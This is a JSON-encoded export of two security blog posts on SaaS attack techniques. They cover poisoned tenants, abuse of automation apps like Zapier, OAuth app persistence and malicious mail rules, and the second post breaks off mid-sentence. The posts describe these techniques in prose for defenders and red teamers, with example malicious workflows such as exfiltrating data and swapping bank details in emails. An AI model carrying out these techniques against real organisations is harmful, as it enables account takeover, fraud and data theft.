estate.",{"data":66144,"content":66145,"nodeType":1312},{},[66146],{"data":66147,"marks":66148,"value":66149,"nodeType":864},{},[],"Initial access and poisoned tenants",{"data":66151,"content":66152,"nodeType":860},{},[66153,66157,66166,66169,66178,66182,66190],{"data":66154,"marks":66155,"value":66156,"nodeType":864},{},[],"Attacks like ",{"data":66158,"content":66160,"nodeType":883},{"uri":66159},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/credential_stuffing/description.md",[66161],{"data":66162,"marks":66163,"value":66165,"nodeType":864},{},[66164],{"type":1455},"credential stuffing",{"data":66167,"marks":66168,"value":902,"nodeType":864},{},[],{"data":66170,"content":66172,"nodeType":883},{"uri":66171},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/email_phishing/description.md",[66173],{"data":66174,"marks":66175,"value":66177,"nodeType":864},{},[66176],{"type":1455},"email phishing",{"data":66179,"marks":66180,"value":66181,"nodeType":864},{},[]," that get you initial access to SaaS apps are fairly well known — because they work and are widely used. We’re also starting to see tools and attacks that suggest that ",{"data":66183,"content":66184,"nodeType":883},{"uri":57755},[66185],{"data":66186,"marks":66187,"value":66189,"nodeType":864},{},[66188],{"type":1455},"phishing employees through these IM apps",{"data":66191,"marks":66192,"value":66193,"nodeType":864},{},[]," is about to go mainstream.",{"data":66195,"content":66196,"nodeType":860},{},[66197,66201,66209],{"data":66198,"marks":66199,"value":66200,"nodeType":864},{},[],"Another interesting attack is a spin on the classic waterhole attack called a ",{"data":66202,"content":66203,"nodeType":883},{"uri":58605},[66204],{"data":66205,"marks":66206,"value":66208,"nodeType":864},{},[66207],{"type":1455},"poisoned tenant",{"data":66210,"marks":66211,"value":66212,"nodeType":864},{},[],". Rather than attacking a customer tenant for a SaaS app, the attacker lures employees into joining an attacker-controlled tenant. ",{"data":66214,"content":66215,"nodeType":860},{},[66216],{"data":66217,"marks":66218,"value":66219,"nodeType":864},{},[],"SaaS apps allow anyone to name app tenants (a.k.a. spaces, teams, or instances) anything they like — including your company name. Attackers send invites to your employees from within the app with a customized message explaining why they should join this new tenant (or sign up to the app if they are not already a user). ",{"data":66221,"content":66222,"nodeType":860},{},[66223],{"data":66224,"marks":66225,"value":66226,"nodeType":864},{},[],"Attackers might even pay for premium licenses in the app to further entice employees to join. The attacker then waits for the employee to upload sensitive data or create integrations with other company apps containing crown jewels.",{"data":66228,"content":66229,"nodeType":1312},{},[66230],{"data":66231,"marks":66232,"value":66233,"nodeType":864},{},[],"Living-off-the-(SaaS)-land to persist and avoid detection",{"data":66235,"content":66236,"nodeType":860},{},[66237,66241,66250],{"data":66238,"marks":66239,"value":66240,"nodeType":864},{},[],"In the endpoint world, a favorite technique is the use of legit OS utilities or ",{"data":66242,"content":66244,"nodeType":883},{"uri":66243},"https://lolbas-project.github.io",[66245],{"data":66246,"marks":66247,"value":66249,"nodeType":864},{},[66248],{"type":1455},"LOLBaS",{"data":66251,"marks":66252,"value":66253,"nodeType":864},{},[]," (Living-Off-the-Land Binaries and Scripts), which are often signed Microsoft utilities. Perhaps the most well-known example is executing scripts through PowerShell rather than building custom malware. That isn’t as useful these days, but there was a time when PowerShell was routinely used to bypass AV, EDR, and even app allow-listing.",{"data":66255,"content":66256,"nodeType":860},{},[66257,66261,66268],{"data":66258,"marks":66259,"value":66260,"nodeType":864},{},[],"In that same living-off-the-land mindset, an attacker trying to maintain access to each SaaS app they compromise using custom OAuth integration apps might instead choose to use legit SaaS apps that specialize in workflow automation to create ",{"data":66262,"content":66263,"nodeType":883},{"uri":59957},[66264],{"data":66265,"marks":66266,"value":62172,"nodeType":864},{},[66267],{"type":1455},{"data":66269,"marks":66270,"value":66271,"nodeType":864},{},[],". Utilizing legit SaaS apps also means they can hide in plain sight from incident responders, instead of having to rely on unverified or unpublished integrations.",{"data":66273,"content":66274,"nodeType":860},{},[66275],{"data":66276,"marks":66277,"value":66278,"nodeType":864},{},[],"Perhaps the best example here is using a well-known automation app like Zapier, which claims to have more than 5,000 integrations. These integrations are often verified, approved, and connected to a trusted vendor (Zapier). An attacker might create workflows to:",{"data":66280,"content":66281,"nodeType":941},{},[66282,66292,66302],{"data":66283,"content":66284,"nodeType":945},{},[66285],{"data":66286,"content":66287,"nodeType":860},{},[66288],{"data":66289,"marks":66290,"value":66291,"nodeType":864},{},[],"Do daily data exfiltration from a victim’s data lake.",{"data":66293,"content":66294,"nodeType":945},{},[66295],{"data":66296,"content":66297,"nodeType":860},{},[66298],{"data":66299,"marks":66300,"value":66301,"nodeType":864},{},[],"Configure a webhook that adds malicious accounts to a Github repo on demand.",{"data":66303,"content":66304,"nodeType":945},{},[66305],{"data":66306,"content":66307,"nodeType":860},{},[66308],{"data":66309,"marks":66310,"value":66311,"nodeType":864},{},[],"Automatically find and replace bank account numbers in emails to the finance team.",{"data":66313,"content":66314,"nodeType":860},{},[66315],{"data":66316,"marks":66317,"value":66318,"nodeType":864},{},[],"All appear as legitimate Zapier integrations. But, before you put in alerts specifically for Zapier, know that it’s one of dozens of apps that support these kinds of offensive workflows.",{"data":66320,"content":66321,"nodeType":860},{},[66322,66326,66333],{"data":66323,"marks":66324,"value":66325,"nodeType":864},{},[],"A sneaky attacker might go further and use an ",{"data":66327,"content":66328,"nodeType":883},{"uri":39722},[66329],{"data":66330,"marks":66331,"value":60979,"nodeType":864},{},[66332],{"type":1455},{"data":66334,"marks":66335,"value":66336,"nodeType":864},{},[]," to make another instance of an existing integration — making this backdoor almost impossible to discover.",{"data":66338,"content":66339,"nodeType":1312},{},[66340],{"data":66341,"marks":66342,"value":66343,"nodeType":864},{},[],"Features or vulnerabilities?",{"data":66345,"content":66346,"nodeType":860},{},[66347],{"data":66348,"marks":66349,"value":66350,"nodeType":864},{},[],"When looking for attack techniques, you’re typically going after features that have weaknesses you can abuse rather than bugs in a single app that will be patched. ",{"data":66352,"content":66353,"nodeType":860},{},[66354,66358,66367,66370,66377],{"data":66355,"marks":66356,"value":66357,"nodeType":864},{},[],"It’s pretty common for SaaS apps to skip email verification or allow multiple simultaneous authentication methods. Both of these are conscious design choices in the name of lowering the friction of account creation and reducing customer support. However, these features make techniques like ",{"data":66359,"content":66361,"nodeType":883},{"uri":66360},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/account_ambushing/description.md",[66362],{"data":66363,"marks":66364,"value":66366,"nodeType":864},{},[66365],{"type":1455},"account ambushing",{"data":66368,"marks":66369,"value":902,"nodeType":864},{},[],{"data":66371,"content":66372,"nodeType":883},{"uri":19131},[66373],{"data":66374,"marks":66375,"value":19137,"nodeType":864},{},[66376],{"type":1455},{"data":66378,"marks":66379,"value":66380,"nodeType":864},{},[]," possible. If these attacks become widespread, these might come to be seen more as bugs rather than a positive feature for users.",{"data":66382,"content":66383,"nodeType":860},{},[66384,66388,66397],{"data":66385,"marks":66386,"value":66387,"nodeType":864},{},[],"In other cases, the bugs are serious enough and hard enough to patch that they’re worth noting as a technique. The recently disclosed (and perfectly named) ",{"data":66389,"content":66391,"nodeType":883},{"uri":66390},"https://www.descope.com/blog/post/noauth",[66392],{"data":66393,"marks":66394,"value":66396,"nodeType":864},{},[66395],{"type":1455},"nOAuth",{"data":66398,"marks":66399,"value":66400,"nodeType":864},{},[]," bug fits this bill. ",{"data":66402,"content":66403,"nodeType":860},{},[66404],{"data":66405,"marks":66406,"value":66407,"nodeType":864},{},[],"The bug arises from a confusion between an email identity and email metadata field in Microsoft integrations and without a central fix from MS (the fix isn’t trivial), these bugs are likely to be discovered and re-occur on third-party OAuth apps for a while to come.",{"data":66409,"content":66412,"nodeType":996},{"target":66410},{"sys":66411},{"id":57916,"type":1001,"linkType":1002},[],{"data":66414,"content":66415,"nodeType":1009},{},[66416],{"data":66417,"marks":66418,"value":66419,"nodeType":864},{},[],"The SaaS market is driving these offensive techniques",{"data":66421,"content":66422,"nodeType":860},{},[66423],{"data":66424,"marks":66425,"value":66426,"nodeType":864},{},[],"SaaS apps are basically web apps that are run in the cloud and accessed from endpoints, so then WebApp, endpoint, and cloud security should cover all of SaaS, right? ",{"data":66428,"content":66429,"nodeType":860},{},[66430],{"data":66431,"marks":66432,"value":66433,"nodeType":864},{},[],"That was our assumption when we started, but what we found instead was that SaaS marketing practices are driving a lot of pretty interesting techniques that you don’t run into in standalone web apps.",{"data":66435,"content":66436,"nodeType":1312},{},[66437],{"data":66438,"marks":66439,"value":66440,"nodeType":864},{},[],"Modern SaaS is easy to adopt, easy to use, low friction, low cost, low overhead",{"data":66442,"content":66443,"nodeType":860},{},[66444],{"data":66445,"marks":66446,"value":66447,"nodeType":864},{},[],"Making apps easy to sign up for and low effort to support means you need to make some interesting choices when it comes to designing account creation and recovery flows. ",{"data":66449,"content":66450,"nodeType":860},{},[66451],{"data":66452,"marks":66453,"value":66454,"nodeType":864},{},[],"Many apps allow users to sign into apps using multiple methods, easily invite collaborators (internal and external) and avoid any additional friction during the signup process. ",{"data":66456,"content":66457,"nodeType":860},{},[66458],{"data":66459,"marks":66460,"value":66461,"nodeType":864},{},[],"For example, many apps avoid verifying new account email addresses. This is not laziness, these are conscious design choices — not driven by security clearly, but not accidents.",{"data":66463,"content":66464,"nodeType":1312},{},[66465],{"data":66466,"marks":66467,"value":66468,"nodeType":864},{},[],"Modern SaaS is highly integrated",{"data":66470,"content":66471,"nodeType":860},{},[66472],{"data":66473,"marks":66474,"value":66475,"nodeType":864},{},[],"Most SaaS apps are trying to build app marketplaces or perform well in other apps' marketplaces (often both), and it’s rare these days to find apps that don’t integrate with other apps. ",{"data":66477,"content":66478,"nodeType":860},{},[66479],{"data":66480,"marks":66481,"value":66482,"nodeType":864},{},[],"OAuth has become the de facto standard protocol for doing this, and most users have become quite used to approving OAuth2.0 consent flows. These integrations have opened up lots of incredibly useful doors for attackers to persist access and move laterally across SaaS apps that few incident response teams have run into yet. These tokens don’t expire when you reset passwords, aren’t protected by MFA, and actions they performed are rarely logged. ",{"data":66484,"content":66485,"nodeType":860},{},[66486],{"data":66487,"marks":66488,"value":66489,"nodeType":864},{},[],"These are not bugs or oversights but rather a consequence of how these APIs are intended to be used (by machines, not human adversaries).",{"data":66491,"content":66492,"nodeType":1009},{},[66493],{"data":66494,"marks":66495,"value":66496,"nodeType":864},{},[],"Problems with observing SaaS attacks ",{"data":66498,"content":66499,"nodeType":860},{},[66500,66504,66509],{"data":66501,"marks":66502,"value":66503,"nodeType":864},{},[],"This research begs one question above others: ",{"data":66505,"marks":66506,"value":66508,"nodeType":864},{},[66507],{"type":2246},"“Are we seeing these attacks in the wild?",{"data":66510,"marks":66511,"value":66512,"nodeType":864},{},[],"” ",{"data":66514,"content":66515,"nodeType":1312},{},[66516],{"data":66517,"marks":66518,"value":66519,"nodeType":864},{},[],"Yes, definitely",{"data":66521,"content":66522,"nodeType":860},{},[66523,66527,66536,66539,66548,66552,66561,66565,66573,66577,66586],{"data":66524,"marks":66525,"value":66526,"nodeType":864},{},[],"For some of the better-known techniques, like credential stuffing and email phishing, the answer is an easy yes. Stats from ",{"data":66528,"content":66530,"nodeType":883},{"uri":66529},"https://www.microsoft.com/en-us/security/blog/2023/05/04/how-microsoft-can-help-you-go-passwordless-this-world-password-day/",[66531],{"data":66532,"marks":66533,"value":66535,"nodeType":864},{},[66534],{"type":1455},"Microsoft (1,287 password attacks every second)",{"data":66537,"marks":66538,"value":902,"nodeType":864},{},[],{"data":66540,"content":66542,"nodeType":883},{"uri":66541},"https://auth0.com/blog/top-insights-from-our-2022-state-of-secure-identity-report/",[66543],{"data":66544,"marks":66545,"value":66547,"nodeType":864},{},[66546],{"type":1455},"Auth0 (a third of their traffic is credential stuffing)",{"data":66549,"marks":66550,"value":66551,"nodeType":864},{},[]," speaks volumes. Other sources like the ",{"data":66553,"content":66555,"nodeType":883},{"uri":66554},"https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2022/cyber-security-breaches-survey-2022",[66556],{"data":66557,"marks":66558,"value":66560,"nodeType":864},{},[66559],{"type":1455},"NCSC's Cyber Security Breaches Survey 2022",{"data":66562,"marks":66563,"value":66564,"nodeType":864},{},[]," and the ",{"data":66566,"content":66567,"nodeType":883},{"uri":19589},[66568],{"data":66569,"marks":66570,"value":66572,"nodeType":864},{},[66571],{"type":1455},"Verizon 2023 Data Breach Investigations Report",{"data":66574,"marks":66575,"value":66576,"nodeType":864},{},[]," suggest that phishing is also a major cause of SaaS breaches. Anecdotal reports from colleagues in the Incident Response field suggest that malicious mail forwarding rules are seen a lot, something which is supported by the ",{"data":66578,"content":66580,"nodeType":883},{"uri":66579},"https://expel.com/expel-quarterly-threat-report/",[66581],{"data":66582,"marks":66583,"value":66585,"nodeType":864},{},[66584],{"type":1455},"Expel Quarterly Threat Report for Q1 2023",{"data":66587,"marks":66588,"value":66589,"nodeType":864},{},[]," (see page 6).",{"data":66591,"content":66592,"nodeType":860},{},[66593],{"data":66594,"marks":66595,"value":66596,"nodeType":864},{},[],"The takeaway is that the current focus for defenders should be to ensure users have good phishing-resistant account security in place — make sure you have basics like strong unique passwords and MFA in place across your entire SaaS estate.",{"data":66598,"content":66599,"nodeType":1312},{},[66600],{"data":66601,"marks":66602,"value":66603,"nodeType":864},{},[],"For newer OAuth attacks, it’s a lot less clear …",{"data":66605,"content":66606,"nodeType":860},{},[66607,66611,66616,66620,66629],{"data":66608,"marks":66609,"value":66610,"nodeType":864},{},[],"Other techniques like consent phishing have been discussed in some breach disclosures like the ",{"data":66612,"marks":66613,"value":66615,"nodeType":864},{},[66614],{"type":1455},"2020 SANS breach",{"data":66617,"marks":66618,"value":66619,"nodeType":864},{},[],". These OAuth techniques also pop up in the news (for example, the ",{"data":66621,"content":66623,"nodeType":883},{"uri":66622},"https://www.bleepingcomputer.com/news/security/github-how-stolen-oauth-tokens-helped-breach-dozens-of-orgs/",[66624],{"data":66625,"marks":66626,"value":66628,"nodeType":864},{},[66627],{"type":1455},"2022 Github/Heroku/Travis-CI breach",{"data":66630,"marks":66631,"value":66632,"nodeType":864},{},[]," where GitHub accounts were breached using stolen Heroku and Travis-CI OAuth tokens). ",{"data":66634,"content":66635,"nodeType":860},{},[66636,66640,66645],{"data":66637,"marks":66638,"value":66639,"nodeType":864},{},[],"That said, none of these techniques come up as frequently as their usefulness would suggest. This means one of two things: ",{"data":66641,"marks":66642,"value":66644,"nodeType":864},{},[66643],{"type":2246},"Either attackers aren’t yet using them widely, or they are and we aren’t detecting them",{"data":66646,"marks":66647,"value":2924,"nodeType":864},{},[],{"data":66649,"content":66650,"nodeType":860},{},[66651],{"data":66652,"marks":66653,"value":66654,"nodeType":864},{},[],"There is certainly a case to be made that attackers simply don’t need these newer techniques yet. Many organizations don’t have a way of discovering SaaS use in their organization yet, never mind breached accounts, so new persistence techniques might be a bit more than necessary at the moment.",{"data":66656,"content":66657,"nodeType":1312},{},[66658],{"data":66659,"marks":66660,"value":66661,"nodeType":864},{},[],"But would we know if it was happening?",{"data":66663,"content":66664,"nodeType":860},{},[66665],{"data":66666,"marks":66667,"value":66668,"nodeType":864},{},[],"On the other hand, there is certainly the possibility that these attacks are increasingly used, but are simply not being discovered. A strong argument in favor of this view is the difficulty in investigating these attacks. Very few SaaS apps provide enough logging capability to discover these attacks as a customer. This is true even for the biggest, most mature apps like Office 365 and Google Workspace unless you are on top license tiers. This is doubly true for attacks that use OAuth, with many apps providing no insight or details into actions made using OAuth-authenticated APIs. ",{"data":66670,"content":66671,"nodeType":860},{},[66672,66676,66685,66689,66698],{"data":66673,"marks":66674,"value":66675,"nodeType":864},{},[],"This suggests only the SaaS providers for these apps are really in a position to discover and investigate them. This does ring true when you consider that ",{"data":66677,"content":66679,"nodeType":883},{"uri":66678},"https://blog.heroku.com/april-2022-incident-review",[66680],{"data":66681,"marks":66682,"value":66684,"nodeType":864},{},[66683],{"type":1455},"Heroku",{"data":66686,"marks":66687,"value":66688,"nodeType":864},{},[]," relied heavily on Github during the investigation (and in one case even the detection of) their 2022 breaches, and the same seems true for a similar breach affecting ",{"data":66690,"content":66692,"nodeType":883},{"uri":66691},"https://circleci.com/blog/jan-4-2023-incident-report/",[66693],{"data":66694,"marks":66695,"value":66697,"nodeType":864},{},[66696],{"type":1455},"CircleCI",{"data":66699,"marks":66700,"value":66701,"nodeType":864},{},[]," later that year. Github and CircleCI’s customers prompted the investigation after seeing strange behavior, but Github had access to the logs to investigate. It’s difficult to imagine that most or even many SaaS vendors have the resources or inclination to run these investigations effectively as GitHub appears to have.",{"data":66703,"content":66704,"nodeType":860},{},[66705,66709,66719],{"data":66706,"marks":66707,"value":66708,"nodeType":864},{},[],"So, are these attacks happening in the real world? My best guess is it’s a little bit of column A and a little bit of column B — there are likely not so many of these attacks happening yet, and when they do, I suspect the vast majority go undetected. ",{"data":66710,"content":66712,"nodeType":883},{"uri":66711},"https://www.youtube.com/watch?v=j95kNwZw8YY",[66713],{"data":66714,"marks":66715,"value":66718,"nodeType":864},{},[66716,66717],{"type":1455},{"type":2246},"But that’s just like my opinion, man.",{"data":66720,"marks":66721,"value":21,"nodeType":864},{},[],{"data":66723,"content":66724,"nodeType":860},{},[66725],{"data":66726,"marks":66727,"value":66728,"nodeType":864},{},[],"This is part of the reason we think enabling red teamers to try these techniques in anger is useful — this is the time-proven way to understand these risks.",{"data":66730,"content":66731,"nodeType":1009},{},[66732],{"data":66733,"marks":66734,"value":66735,"nodeType":864},{},[],"What’s next?",{"data":66737,"content":66738,"nodeType":860},{},[66739],{"data":66740,"marks":66741,"value":66742,"nodeType":864},{},[],"We’ve barely scratched the surface, but perhaps there is enough here to get the discussion going. From past experience, discussion may not be enough, and it’s likely that live offensive work like penetration tests or more likely red team exercises will be required to make the risks of using these techniques real for the wider security community. ",{"data":66744,"content":66745,"nodeType":860},{},[66746],{"data":66747,"marks":66748,"value":66749,"nodeType":864},{},[],"After all, seeing is believing. We think some more practical examples and tools to help red  teamers use these techniques on engagements will help drive awareness forward, so we’ll be looking to build out this content.",{"data":66751,"content":66752,"nodeType":860},{},[66753,66757,66766],{"data":66754,"marks":66755,"value":66756,"nodeType":864},{},[],"We’ve started with pure networkless attacks that don’t touch customer networks or endpoints, but there are many useful techniques to connect the old endpoint world to the SaaS world. Consider stealing OAuth tokens from a thick client on an endpoint, or using a ",{"data":66758,"content":66760,"nodeType":883},{"uri":66759},"https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/",[66761],{"data":66762,"marks":66763,"value":66765,"nodeType":864},{},[66764],{"type":1455},"backdoored GitHub repo to get code execution on endpoints",{"data":66767,"marks":66768,"value":2924,"nodeType":864},{},[],{"data":66770,"content":66771,"nodeType":860},{},[66772,66776,66783],{"data":66773,"marks":66774,"value":66775,"nodeType":864},{},[],"Help us all better understand how widespread these attacks are by sharing some war stories. We’d love some comments, discussions, or PRs on ",{"data":66777,"content":66778,"nodeType":883},{"uri":6418},[66779],{"data":66780,"marks":66781,"value":6423,"nodeType":864},{},[66782],{"type":1455},{"data":66784,"marks":66785,"value":66786,"nodeType":864},{},[],"!",{"data":66788,"content":66791,"nodeType":996},{"target":66789},{"sys":66790},{"id":58370,"type":1001,"linkType":1002},[],{"data":66793,"content":66794,"nodeType":860},{},[66795],{"data":66796,"marks":66797,"value":21,"nodeType":864},{},[],"Let’s talk about SaaS attack techniques","Offensive security drives defensive security. We're sharing a collection of SaaS attack techniques to help defenders understand the threats they face.","2023-07-27T00:00:00.000Z","saas-attack-techniques",{"items":66803},[66804,66806],{"sys":66805,"name":6593},{"id":6592},{"sys":66807,"name":342},{"id":6596},{"items":66809},[66810],{"fullName":10772,"firstName":10773,"jobTitle":10774,"profilePicture":66811},{"url":10776},{"__typename":2059,"sys":66813,"content":66814,"title":62629,"synopsis":67248,"hashTags":59,"publishedDate":67249,"slug":62630,"tagsCollection":67250,"authorsCollection":67254},{"id":62145},{"json":66815},{"data":66816,"content":66817,"nodeType":856},{},[66818,66825,66832,66839,66846,66853,66859,66866,66873,66880,66887,66893,66900,66906,66926,66933,66939,66958,66978,66997,67004,67011,67018,67025,67031,67037,67044,67051,67058,67065,67071,67078,67126,67132,67138,67156,67162,67169,67175,67182,67188,67195,67202,67208,67214,67220,67227,67234,67241],{"data":66819,"content":66820,"nodeType":860},{},[66821],{"data":66822,"marks":66823,"value":66824,"nodeType":864},{},[],"As an attacker, we have a wide range of persistence options available to us in a traditional account or endpoint compromise scenario. From discovering a user's password, to creating new backdoor accounts, to using one of an insane number of \"run keys\" to keep an implant running beyond reboot, or even moving laterally to other internal systems - an attacker has plenty of choice.",{"data":66826,"content":66827,"nodeType":860},{},[66828],{"data":66829,"marks":66830,"value":66831,"nodeType":864},{},[],"But how does this change in a SaaS-first world? In this post, we'll consider some of the new challenges and opportunities that are presented to an attacker who wants to maintain persistence in the new world order, so you can better investigate incidents and quickly defend against attacks. We'll cover a variety of techniques, including malicious mail rules, OAuth backdoor tricks and document sharing links to see how persistence can be maintained, even in the event of password changes and device wipes.",{"data":66833,"content":66834,"nodeType":1009},{},[66835],{"data":66836,"marks":66837,"value":66838,"nodeType":864},{},[],"So what’s changed?",{"data":66840,"content":66841,"nodeType":860},{},[66842],{"data":66843,"marks":66844,"value":66845,"nodeType":864},{},[],"In a traditional compromise scenario, a common example would be an endpoint compromised through phishing, which is used to deliver a malicious implant to establish a command and control channel with the endpoint. In order to maintain access, an attacker would likely use one or more endpoint persistence methods to ensure their implant is launched again post-reboot when the user turns their laptop off for the day. ",{"data":66847,"content":66848,"nodeType":860},{},[66849],{"data":66850,"marks":66851,"value":66852,"nodeType":864},{},[],"This would often become a foothold into the internal network of the compromised organization. The endpoint or user is the start, but an attacker may seek to move laterally to other endpoints and servers on the internal network, where security is often much lower than the external perimeter.",{"data":66854,"content":66858,"nodeType":996},{"target":66855},{"sys":66856},{"id":66857,"type":1001,"linkType":1002},"5aSsHI9aZjsZIIXcV3YDYk",[],{"data":66860,"content":66861,"nodeType":860},{},[66862],{"data":66863,"marks":66864,"value":66865,"nodeType":864},{},[],"In a SaaS-first world, this situation has begun to change somewhat. There are many companies now that have significantly reduced the size of their internal networks or are even fully in the cloud and do not have any internal network infrastructure. In this case, traditional lateral movement becomes much more difficult or impossible. Additionally, endpoints are becoming increasingly hard targets to compromise and incident response teams have matured and have gotten better at cleaning up endpoint compromises. ",{"data":66867,"content":66868,"nodeType":860},{},[66869],{"data":66870,"marks":66871,"value":66872,"nodeType":864},{},[],"The consequence of this is that attackers need to make the most use of the access they have during an endpoint or user compromise and maintain access where possible, even in the event of a password reset and full laptop wipe. Additionally, new SaaS-focused persistence options are now possible, which are also often resistant to password changes and endpoints wipes, so these are increasingly attractive options for an attacker. ",{"data":66874,"content":66875,"nodeType":860},{},[66876],{"data":66877,"marks":66878,"value":66879,"nodeType":864},{},[],"One other change is that persistence is less binary than it has been traditionally. Typically, persistence would often be on a per-user or per-endpoint basis. Either an attacker would have full control of a user account (e.g. knowing the password) or full control of an endpoint (e.g. an implant running on the endpoint). The main differentiation would be in whether endpoint-level access was administrative level control over the endpoint or an implant running as a low-privileged user account. However, in the SaaS-world persistence is much more asset dependent and thus less binary. It could be persistent access to email, or documents, or chat conversations or any number of other assets and capabilities.",{"data":66881,"content":66882,"nodeType":1312},{},[66883],{"data":66884,"marks":66885,"value":66886,"nodeType":864},{},[],"Mail rules",{"data":66888,"content":66892,"nodeType":996},{"target":66889},{"sys":66890},{"id":66891,"type":1001,"linkType":1002},"3bcLzOfZupSDatdzfFrJDQ",[],{"data":66894,"content":66895,"nodeType":860},{},[66896],{"data":66897,"marks":66898,"value":66899,"nodeType":864},{},[],"Mail rules are a handy feature found in most email clients. You might have used them to forward emails to your teammates while you’re off sipping Piña Coladas, or to move incoming email from that spammy colleague to the “don’t read” folder. However, they can also be used for a range of malicious activities, such as forwarding emails to an external address (e.g. password resets, invoices, “confidential” emails etc) or deleting emails (e.g. security alerts!). A good example of a real-world attack involving this technique was the 2020 SANS breach.\n",{"data":66901,"content":66905,"nodeType":996},{"target":66902},{"sys":66903},{"id":66904,"type":1001,"linkType":1002},"5RoIfopOGmTaORtG7fqYQo",[],{"data":66907,"content":66908,"nodeType":860},{},[66909,66913,66923],{"data":66910,"marks":66911,"value":66912,"nodeType":864},{},[],"If you want to read more about this technique, you can check out our ",{"data":66914,"content":66918,"nodeType":57700},{"target":66915},{"sys":66916},{"id":66917,"type":1001,"linkType":1002},"2zZ8kxP0t8Smi9b6hpT34k",[66919],{"data":66920,"marks":66921,"value":66922,"nodeType":864},{},[],"previous article",{"data":66924,"marks":66925,"value":2924,"nodeType":864},{},[],{"data":66927,"content":66928,"nodeType":1312},{},[66929],{"data":66930,"marks":66931,"value":66932,"nodeType":864},{},[],"OAuth attack #1: Custom OAuth app integration",{"data":66934,"content":66938,"nodeType":996},{"target":66935},{"sys":66936},{"id":66937,"type":1001,"linkType":1002},"7suW3GZpDsu2RnopkUiA3L",[],{"data":66940,"content":66941,"nodeType":860},{},[66942,66946,66955],{"data":66943,"marks":66944,"value":66945,"nodeType":864},{},[],"OAuth apps can be used to request permanent access to a set of permissions on behalf of a user. This can be as simple as the ability to verify a user’s identity for a simple social login or it could be as permissive as having full control over email, document stores, wiki pages, admin capabilities, etc. You can read more details about this in our ",{"data":66947,"content":66951,"nodeType":57700},{"target":66948},{"sys":66949},{"id":66950,"type":1001,"linkType":1002},"68syxk4cmD6QOdVRcDqgEZ",[66952],{"data":66953,"marks":66954,"value":66922,"nodeType":864},{},[],{"data":66956,"marks":66957,"value":10094,"nodeType":864},{},[],{"data":66959,"content":66960,"nodeType":860},{},[66961,66965,66974],{"data":66962,"marks":66963,"value":66964,"nodeType":864},{},[],"However, from an attacker’s perspective a custom OAuth app could be created with sensitive permissions and connected to a user’s account in order to maintain access to their data. In the event that an attacker has compromised a user’s account or endpoint, they could directly consent to their own malicious OAuth app on behalf of the user in order to gain persistence. This could also be achieved as part of a ",{"data":66966,"content":66970,"nodeType":57700},{"target":66967},{"sys":66968},{"id":66969,"type":1001,"linkType":1002},"1bV8YTSQHvveCTnRc4H8su",[66971],{"data":66972,"marks":66973,"value":22602,"nodeType":864},{},[],{"data":66975,"marks":66976,"value":66977,"nodeType":864},{},[]," attack to effectively compromise a user’s account and gain this persistence at the same time. In either case, this would enable continued access to the user’s data even if their password is changed and their endpoint fully wiped.   ",{"data":66979,"content":66980,"nodeType":860},{},[66981,66985,66993],{"data":66982,"marks":66983,"value":66984,"nodeType":864},{},[],"Attacks utilizing these types of techniques are becoming increasingly common and Microsoft even ",{"data":66986,"content":66988,"nodeType":883},{"uri":66987},"https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-OAuth-applications-used-to-compromise-email-servers-and-spread-spam/",[66989],{"data":66990,"marks":66991,"value":66992,"nodeType":864},{},[],"wrote about some real-world attacks",{"data":66994,"marks":66995,"value":66996,"nodeType":864},{},[]," they uncovered recently that involved the use of malicious OAuth apps.",{"data":66998,"content":66999,"nodeType":1312},{},[67000],{"data":67001,"marks":67002,"value":67003,"nodeType":864},{},[],"OAuth attack #2: SaaS platform integration",{"data":67005,"content":67006,"nodeType":860},{},[67007],{"data":67008,"marks":67009,"value":67010,"nodeType":864},{},[],"A similar approach to using a custom OAuth app is to make use of legitimate SaaS services that allow an attacker to make sensitive integrations as a more hide-in-plain-sight approach. For example, let’s take the popular SaaS platform Canva, a graphic design tool that is used to create social media graphics, presentations, posters, documents and other visual content, as an example. Canva, like many SaaS platforms, allows you to make integrations with document stores like OneDrive and Google Drive in order to easily import and export files between Canva and them. If an attacker is interested primarily in maintaining access to a user’s files, then they could make an integration with a platform like Canva and then use that to maintain access.",{"data":67012,"content":67013,"nodeType":860},{},[67014],{"data":67015,"marks":67016,"value":67017,"nodeType":864},{},[],"While this doesn’t provide any raw capabilities beyond a custom OAuth app, an attacker may be more likely to go undetected in this scenario. Discovering an integration with a completely unknown, unverified OAuth app that hasn’t been seen in use elsewhere in the organization, or anywhere at all, is suspicious. Finding an integration with a major SaaS platform, particularly if it is one in use by other users in the organization, is much less suspicious. Additionally, many of them will have verified ticks having been through Microsoft’s or Google’s own verification processes. The only downside for an attacker is having to find SaaS platforms that request the correct permissions and provide the functionality that the attacker is looking for, whereas a custom OAuth app could be used to request any permissions and code could be written to use those permissions however an attacker would like.",{"data":67019,"content":67020,"nodeType":860},{},[67021],{"data":67022,"marks":67023,"value":67024,"nodeType":864},{},[],"If a custom OAuth app is the equivalent of a custom implant on an endpoint, then using a legitimate SaaS platform integration is the equivalent of a more living-off-the-land approach, such as using TeamViewer, RDP or Powershell, etc.\n",{"data":67026,"content":67030,"nodeType":996},{"target":67027},{"sys":67028},{"id":67029,"type":1001,"linkType":1002},"53pL4O8zgfLBKqZbbcN3aI",[],{"data":67032,"content":67036,"nodeType":996},{"target":67033},{"sys":67034},{"id":67035,"type":1001,"linkType":1002},"6ovQnE1bu7tVCJr4OfzfhI",[],{"data":67038,"content":67039,"nodeType":1312},{},[67040],{"data":67041,"marks":67042,"value":67043,"nodeType":864},{},[],"OAuth attack #3: Legitimate desktop/mobile app impersonation",{"data":67045,"content":67046,"nodeType":860},{},[67047],{"data":67048,"marks":67049,"value":67050,"nodeType":864},{},[],"Ok, we promise this is the last OAuth variation example - but it’s another interesting way to abuse OAuth connections! Previously, we spoke of either connecting a custom OAuth app or using an OAuth integration via a legitimate SaaS platform. A custom OAuth app has the most flexibility for an attacker, but looks far more suspicious if discovered, whereas a legitimate SaaS platform looks much more….well, legitimate!",{"data":67052,"content":67053,"nodeType":860},{},[67054],{"data":67055,"marks":67056,"value":67057,"nodeType":864},{},[],"What if you could have both of those advantages in one? Well, that can be achieved, too! The reason SaaS platforms don’t have the same flexibility is because they keep their client IDs and secrets for their apps so the attacker can only use the OAuth app indirectly via the features provided by the SaaS platform. However, some OAuth connections are made using 